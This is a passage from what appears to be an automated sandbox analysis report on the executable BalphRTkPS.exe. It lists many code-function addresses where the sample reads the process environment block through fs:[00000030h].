                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172C156 mov eax, dword ptr fs:[00000030h]6_2_0172C156
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C8158 mov eax, dword ptr fs:[00000030h]6_2_017C8158
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01736154 mov eax, dword ptr fs:[00000030h]6_2_01736154
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01736154 mov eax, dword ptr fs:[00000030h]6_2_01736154
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C4144 mov eax, dword ptr fs:[00000030h]6_2_017C4144
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C4144 mov eax, dword ptr fs:[00000030h]6_2_017C4144
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C4144 mov ecx, dword ptr fs:[00000030h]6_2_017C4144
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C4144 mov eax, dword ptr fs:[00000030h]6_2_017C4144
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C4144 mov eax, dword ptr fs:[00000030h]6_2_017C4144
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01760124 mov eax, dword ptr fs:[00000030h]6_2_01760124
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017DA118 mov ecx, dword ptr fs:[00000030h]6_2_017DA118
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017DA118 mov eax, dword ptr fs:[00000030h]6_2_017DA118
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017DA118 mov eax, dword ptr fs:[00000030h]6_2_017DA118
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017DA118 mov eax, dword ptr fs:[00000030h]6_2_017DA118
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_018061E5 mov eax, dword ptr fs:[00000030h]6_2_018061E5
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F0115 mov eax, dword ptr fs:[00000030h]6_2_017F0115
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017601F8 mov eax, dword ptr fs:[00000030h]6_2_017601F8
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE1D0 mov eax, dword ptr fs:[00000030h]6_2_017AE1D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE1D0 mov eax, dword ptr fs:[00000030h]6_2_017AE1D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE1D0 mov ecx, dword ptr fs:[00000030h]6_2_017AE1D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE1D0 mov eax, dword ptr fs:[00000030h]6_2_017AE1D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE1D0 mov eax, dword ptr fs:[00000030h]6_2_017AE1D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F61C3 mov eax, dword ptr fs:[00000030h]6_2_017F61C3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F61C3 mov eax, dword ptr fs:[00000030h]6_2_017F61C3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B019F mov eax, dword ptr fs:[00000030h]6_2_017B019F
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B019F mov eax, dword ptr fs:[00000030h]6_2_017B019F
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B019F mov eax, dword ptr fs:[00000030h]6_2_017B019F
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B019F mov eax, dword ptr fs:[00000030h]6_2_017B019F
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172A197 mov eax, dword ptr fs:[00000030h]6_2_0172A197
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172A197 mov eax, dword ptr fs:[00000030h]6_2_0172A197
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172A197 mov eax, dword ptr fs:[00000030h]6_2_0172A197
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01770185 mov eax, dword ptr fs:[00000030h]6_2_01770185
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017EC188 mov eax, dword ptr fs:[00000030h]6_2_017EC188
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017EC188 mov eax, dword ptr fs:[00000030h]6_2_017EC188
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D4180 mov eax, dword ptr fs:[00000030h]6_2_017D4180
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D4180 mov eax, dword ptr fs:[00000030h]6_2_017D4180
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175C073 mov eax, dword ptr fs:[00000030h]6_2_0175C073
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01732050 mov eax, dword ptr fs:[00000030h]6_2_01732050
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6050 mov eax, dword ptr fs:[00000030h]6_2_017B6050
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C6030 mov eax, dword ptr fs:[00000030h]6_2_017C6030
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172A020 mov eax, dword ptr fs:[00000030h]6_2_0172A020
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172C020 mov eax, dword ptr fs:[00000030h]6_2_0172C020
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174E016 mov eax, dword ptr fs:[00000030h]6_2_0174E016
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174E016 mov eax, dword ptr fs:[00000030h]6_2_0174E016
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174E016 mov eax, dword ptr fs:[00000030h]6_2_0174E016
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174E016 mov eax, dword ptr fs:[00000030h]6_2_0174E016
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B4000 mov ecx, dword ptr fs:[00000030h]6_2_017B4000
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D2000 mov eax, dword ptr fs:[00000030h]6_2_017D2000
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D2000 mov eax, dword ptr fs:[00000030h]6_2_017D2000
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D2000 mov eax, dword ptr fs:[00000030h]6_2_017D2000
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D2000 mov eax, dword ptr fs:[00000030h]6_2_017D2000
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D2000 mov eax, dword ptr fs:[00000030h]6_2_017D2000
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D2000 mov eax, dword ptr fs:[00000030h]6_2_017D2000
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D2000 mov eax, dword ptr fs:[00000030h]6_2_017D2000
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D2000 mov eax, dword ptr fs:[00000030h]6_2_017D2000
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172C0F0 mov eax, dword ptr fs:[00000030h]6_2_0172C0F0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017720F0 mov ecx, dword ptr fs:[00000030h]6_2_017720F0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172A0E3 mov ecx, dword ptr fs:[00000030h]6_2_0172A0E3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017380E9 mov eax, dword ptr fs:[00000030h]6_2_017380E9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B60E0 mov eax, dword ptr fs:[00000030h]6_2_017B60E0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B20DE mov eax, dword ptr fs:[00000030h]6_2_017B20DE
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F60B8 mov eax, dword ptr fs:[00000030h]6_2_017F60B8
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F60B8 mov ecx, dword ptr fs:[00000030h]6_2_017F60B8
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C80A8 mov eax, dword ptr fs:[00000030h]6_2_017C80A8
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173208A mov eax, dword ptr fs:[00000030h]6_2_0173208A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D437C mov eax, dword ptr fs:[00000030h]6_2_017D437C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B035C mov eax, dword ptr fs:[00000030h]6_2_017B035C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B035C mov eax, dword ptr fs:[00000030h]6_2_017B035C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B035C mov eax, dword ptr fs:[00000030h]6_2_017B035C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B035C mov ecx, dword ptr fs:[00000030h]6_2_017B035C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B035C mov eax, dword ptr fs:[00000030h]6_2_017B035C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B035C mov eax, dword ptr fs:[00000030h]6_2_017B035C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FA352 mov eax, dword ptr fs:[00000030h]6_2_017FA352
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B2349 mov eax, dword ptr fs:[00000030h]6_2_017B2349
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172C310 mov ecx, dword ptr fs:[00000030h]6_2_0172C310
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01750310 mov ecx, dword ptr fs:[00000030h]6_2_01750310
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A30B mov eax, dword ptr fs:[00000030h]6_2_0176A30B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A30B mov eax, dword ptr fs:[00000030h]6_2_0176A30B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A30B mov eax, dword ptr fs:[00000030h]6_2_0176A30B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174E3F0 mov eax, dword ptr fs:[00000030h]6_2_0174E3F0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174E3F0 mov eax, dword ptr fs:[00000030h]6_2_0174E3F0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174E3F0 mov eax, dword ptr fs:[00000030h]6_2_0174E3F0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017663FF mov eax, dword ptr fs:[00000030h]6_2_017663FF
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017403E9 mov eax, dword ptr fs:[00000030h]6_2_017403E9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017403E9 mov eax, dword ptr fs:[00000030h]6_2_017403E9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017403E9 mov eax, dword ptr fs:[00000030h]6_2_017403E9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017403E9 mov eax, dword ptr fs:[00000030h]6_2_017403E9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017403E9 mov eax, dword ptr fs:[00000030h]6_2_017403E9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017403E9 mov eax, dword ptr fs:[00000030h]6_2_017403E9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017403E9 mov eax, dword ptr fs:[00000030h]6_2_017403E9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017403E9 mov eax, dword ptr fs:[00000030h]6_2_017403E9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D43D4 mov eax, dword ptr fs:[00000030h]6_2_017D43D4
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D43D4 mov eax, dword ptr fs:[00000030h]6_2_017D43D4
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017EC3CD mov eax, dword ptr fs:[00000030h]6_2_017EC3CD
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A3C0 mov eax, dword ptr fs:[00000030h]6_2_0173A3C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A3C0 mov eax, dword ptr fs:[00000030h]6_2_0173A3C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A3C0 mov eax, dword ptr fs:[00000030h]6_2_0173A3C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A3C0 mov eax, dword ptr fs:[00000030h]6_2_0173A3C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A3C0 mov eax, dword ptr fs:[00000030h]6_2_0173A3C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A3C0 mov eax, dword ptr fs:[00000030h]6_2_0173A3C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017383C0 mov eax, dword ptr fs:[00000030h]6_2_017383C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017383C0 mov eax, dword ptr fs:[00000030h]6_2_017383C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017383C0 mov eax, dword ptr fs:[00000030h]6_2_017383C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017383C0 mov eax, dword ptr fs:[00000030h]6_2_017383C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B63C0 mov eax, dword ptr fs:[00000030h]6_2_017B63C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01728397 mov eax, dword ptr fs:[00000030h]6_2_01728397
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01728397 mov eax, dword ptr fs:[00000030h]6_2_01728397
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01728397 mov eax, dword ptr fs:[00000030h]6_2_01728397
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172E388 mov eax, dword ptr fs:[00000030h]6_2_0172E388
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172E388 mov eax, dword ptr fs:[00000030h]6_2_0172E388
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172E388 mov eax, dword ptr fs:[00000030h]6_2_0172E388
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175438F mov eax, dword ptr fs:[00000030h]6_2_0175438F
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175438F mov eax, dword ptr fs:[00000030h]6_2_0175438F
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0274 mov eax, dword ptr fs:[00000030h]6_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0274 mov eax, dword ptr fs:[00000030h]6_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0274 mov eax, dword ptr fs:[00000030h]6_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0274 mov eax, dword ptr fs:[00000030h]6_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0274 mov eax, dword ptr fs:[00000030h]6_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0274 mov eax, dword ptr fs:[00000030h]6_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0274 mov eax, dword ptr fs:[00000030h]6_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0274 mov eax, dword ptr fs:[00000030h]6_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0274 mov eax, dword ptr fs:[00000030h]6_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0274 mov eax, dword ptr fs:[00000030h]6_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0274 mov eax, dword ptr fs:[00000030h]6_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0274 mov eax, dword ptr fs:[00000030h]6_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01734260 mov eax, dword ptr fs:[00000030h]6_2_01734260
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01734260 mov eax, dword ptr fs:[00000030h]6_2_01734260
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01734260 mov eax, dword ptr fs:[00000030h]6_2_01734260
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172826B mov eax, dword ptr fs:[00000030h]6_2_0172826B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172A250 mov eax, dword ptr fs:[00000030h]6_2_0172A250
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01736259 mov eax, dword ptr fs:[00000030h]6_2_01736259
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B8243 mov eax, dword ptr fs:[00000030h]6_2_017B8243
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B8243 mov ecx, dword ptr fs:[00000030h]6_2_017B8243
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172823B mov eax, dword ptr fs:[00000030h]6_2_0172823B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017402E1 mov eax, dword ptr fs:[00000030h]6_2_017402E1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017402E1 mov eax, dword ptr fs:[00000030h]6_2_017402E1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017402E1 mov eax, dword ptr fs:[00000030h]6_2_017402E1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A2C3 mov eax, dword ptr fs:[00000030h]6_2_0173A2C3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A2C3 mov eax, dword ptr fs:[00000030h]6_2_0173A2C3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A2C3 mov eax, dword ptr fs:[00000030h]6_2_0173A2C3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A2C3 mov eax, dword ptr fs:[00000030h]6_2_0173A2C3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A2C3 mov eax, dword ptr fs:[00000030h]6_2_0173A2C3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C62A0 mov eax, dword ptr fs:[00000030h]6_2_017C62A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C62A0 mov ecx, dword ptr fs:[00000030h]6_2_017C62A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C62A0 mov eax, dword ptr fs:[00000030h]6_2_017C62A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C62A0 mov eax, dword ptr fs:[00000030h]6_2_017C62A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C62A0 mov eax, dword ptr fs:[00000030h]6_2_017C62A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C62A0 mov eax, dword ptr fs:[00000030h]6_2_017C62A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E284 mov eax, dword ptr fs:[00000030h]6_2_0176E284
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E284 mov eax, dword ptr fs:[00000030h]6_2_0176E284
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B0283 mov eax, dword ptr fs:[00000030h]6_2_017B0283
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B0283 mov eax, dword ptr fs:[00000030h]6_2_017B0283
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B0283 mov eax, dword ptr fs:[00000030h]6_2_017B0283
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176656A mov eax, dword ptr fs:[00000030h]6_2_0176656A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176656A mov eax, dword ptr fs:[00000030h]6_2_0176656A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176656A mov eax, dword ptr fs:[00000030h]6_2_0176656A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738550 mov eax, dword ptr fs:[00000030h]6_2_01738550
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738550 mov eax, dword ptr fs:[00000030h]6_2_01738550
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740535 mov eax, dword ptr fs:[00000030h]6_2_01740535
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740535 mov eax, dword ptr fs:[00000030h]6_2_01740535
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740535 mov eax, dword ptr fs:[00000030h]6_2_01740535
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740535 mov eax, dword ptr fs:[00000030h]6_2_01740535
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740535 mov eax, dword ptr fs:[00000030h]6_2_01740535
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740535 mov eax, dword ptr fs:[00000030h]6_2_01740535
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E53E mov eax, dword ptr fs:[00000030h]6_2_0175E53E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E53E mov eax, dword ptr fs:[00000030h]6_2_0175E53E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E53E mov eax, dword ptr fs:[00000030h]6_2_0175E53E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E53E mov eax, dword ptr fs:[00000030h]6_2_0175E53E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E53E mov eax, dword ptr fs:[00000030h]6_2_0175E53E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C6500 mov eax, dword ptr fs:[00000030h]6_2_017C6500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017325E0 mov eax, dword ptr fs:[00000030h]6_2_017325E0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C5ED mov eax, dword ptr fs:[00000030h]6_2_0176C5ED
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C5ED mov eax, dword ptr fs:[00000030h]6_2_0176C5ED
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017365D0 mov eax, dword ptr fs:[00000030h]6_2_017365D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A5D0 mov eax, dword ptr fs:[00000030h]6_2_0176A5D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A5D0 mov eax, dword ptr fs:[00000030h]6_2_0176A5D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E5CF mov eax, dword ptr fs:[00000030h]6_2_0176E5CF
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E5CF mov eax, dword ptr fs:[00000030h]6_2_0176E5CF
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017545B1 mov eax, dword ptr fs:[00000030h]6_2_017545B1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017545B1 mov eax, dword ptr fs:[00000030h]6_2_017545B1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B05A7 mov eax, dword ptr fs:[00000030h]6_2_017B05A7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B05A7 mov eax, dword ptr fs:[00000030h]6_2_017B05A7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B05A7 mov eax, dword ptr fs:[00000030h]6_2_017B05A7
